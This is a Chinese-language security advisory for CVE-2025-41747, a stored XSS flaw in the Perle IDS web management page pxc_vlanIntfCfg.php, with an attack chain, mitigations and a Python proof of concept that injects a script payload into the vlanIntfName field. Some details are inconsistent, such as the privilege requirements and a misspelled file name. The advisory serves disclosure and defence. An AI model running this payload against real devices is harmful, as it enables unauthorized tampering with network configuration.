CVE-2025-41747: Perle IDS/WBM管理界面pxc_vlanIntfCfg.php存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-41747

漏洞类型

XSS跨站脚本攻击

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Perle IDS设备Web Based Management (WBM)管理界面

漏洞概述

CVE-2025-41747是Perle IDS设备Web Based Management (WBM)管理界面中发现的一个高危跨站脚本(XSS)漏洞。该漏洞位于pxc_vlanIntfCfg.php文件中，允许未认证的远程攻击者利用存储型XSS技术，通过诱骗已认证的管理员用户发送精心构造的恶意POST请求，从而在受害者的浏览器上下文中执行任意JavaScript代码。虽然该漏洞无法直接获取系统级资源或劫持用户会话（因为会话cookie受httpOnly标志保护），但攻击者可以利用此漏洞修改设备配置参数，如VLAN接口设置等网络配置。攻击的成功高度依赖于用户交互，攻击者需要诱导管理员访问恶意链接或提交包含XSS payload的请求。由于该漏洞影响的是网络设备的管理界面，攻击成功后可能对整个网络基础设施造成严重影响，包括网络分割策略被篡改或网络访问控制被绕过。CVSS 3.1评分7.1分，属于高危级别，主要风险在于网络攻击向量和低权限攻击要求，使得漏洞利用门槛相对较低。

技术细节

该漏洞是一个典型的存储型跨站脚本(XSS)漏洞，存在于Perle IDS设备的Web Based Management (WBM)管理界面的pxc_vlanIntfCfg.php文件中。该文件负责处理VLAN接口配置参数，攻击者可以通过POST请求向该端点注入恶意JavaScript代码。由于应用程序在存储用户输入时未进行充分的输入验证和输出编码，恶意脚本被永久存储在服务器端。当其他管理员访问包含恶意内容的页面时，浏览器会执行这些脚本代码。攻击者利用此漏洞需要以下条件：(1)能够构造包含XSS payload的POST请求；(2)通过社会工程学手段诱导已认证的管理员用户访问恶意链接或提交请求；(3)管理员在已登录状态下与攻击者构造的内容进行交互。漏洞的技术特点包括：攻击向量为网络层(AV:N)，无需特殊权限(PR:N)，但需要用户交互(UI:R)。攻击影响范围包括机密性(C:L)、完整性(I:L)和可用性(A:L)均为低影响。虽然会话cookie受httpOnly标志保护，攻击者无法直接窃取会话，但可以通过XSS修改页面内容或劫持表单提交流程来改变设备配置，如VLAN接口参数等网络设置。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为Perle IDS设备，并发现其WBM管理界面存在pxc_vlanIntfCfg.php端点，该页面用于VLAN接口配置管理。

STEP 2

步骤2: 构造恶意请求

攻击者构造包含XSS payload（如<script>恶意代码</script>）的POST请求，将payload注入到VLAN接口配置参数中，如vlanIntfName字段。

STEP 3

步骤3: 社会工程诱导

攻击者通过钓鱼邮件、恶意链接或其他社会工程手段，诱导已认证的管理员用户访问攻击者控制的页面或提交恶意请求。

STEP 4

步骤4: XSS执行

当管理员访问包含恶意内容的pxc_vlanIntfCfg.php页面时，浏览器解析并执行存储的XSS payload，在管理员的浏览器上下文中运行恶意JavaScript代码。

STEP 5

步骤5: 篡改配置

攻击者通过XSS payload操控表单提交行为，修改VLAN接口配置参数，如改变VLAN ID、接口名称等网络配置，破坏网络分割策略。

STEP 6

步骤6: 持久化控制

由于是存储型XSS，恶意脚本永久保存在服务器端，所有访问该页面的管理员都会触发payload，实现对网络设备配置的持续篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-41747 PoC - Stored XSS in pxc_vlanIntfCfg.php
# Target: Perle IDS WBM (Web Based Management)

TARGET_URL = "http://<target-ip>/pxc_vlanIntfCfg.php"
XSS_PAYLOAD = '<script>alert("XSS")</script>'

def exploit(target_ip):
    """
    Exploit for CVE-2025-41747: Stored XSS in VLAN interface configuration
    This PoC demonstrates how an unauthenticated attacker can inject XSS payload
    through the VLAN interface configuration parameter.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Malicious POST data with XSS payload in VLAN interface parameter
    data = {
        'vlanIntfName': XSS_PAYLOAD,
        'vlanId': '100',
        'action': 'save'
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, headers=headers, timeout=10)
        print(f'[+] Payload sent to {target_ip}')
        print(f'[+] Status code: {response.status_code}')
        print('[+] XSS payload injected in VLAN interface configuration')
        print('[+] When admin visits the page, the script will execute')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'Usage: python {sys.argv[0]} <target-ip>')
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

Perle IDS设备 WBM管理界面 pxg_vlanIntfCfg.php < 受影响版本

具体版本信息需参考厂商官方公告

防御指南

临时缓解措施

由于该漏洞存在于网络设备的管理界面，建议采取以下临时缓解措施：1) 在防火墙层面限制对WBM管理界面的访问，仅允许受信任的管理网段访问；2) 禁用不必要的WBM管理功能或暂时关闭相关管理页面；3) 提醒管理员不要点击来自不可信来源的链接，避免访问可疑网站；4) 启用详细的审计日志，记录所有管理操作以便事后分析；5) 考虑使用专门的管理VLAN，将管理流量与生产网络隔离；6) 监控网络设备配置变更，发现异常及时回滚。在应用官方补丁之前，应评估业务影响并制定回滚计划。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-41747
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-41747
3 Details https://www.cvedetails.com/cve/CVE-2025-41747/
4 VulDB https://vuldb.com/cve/CVE-2025-41747
5 Link https://certvde.com/de/advisories/VDE-2025-071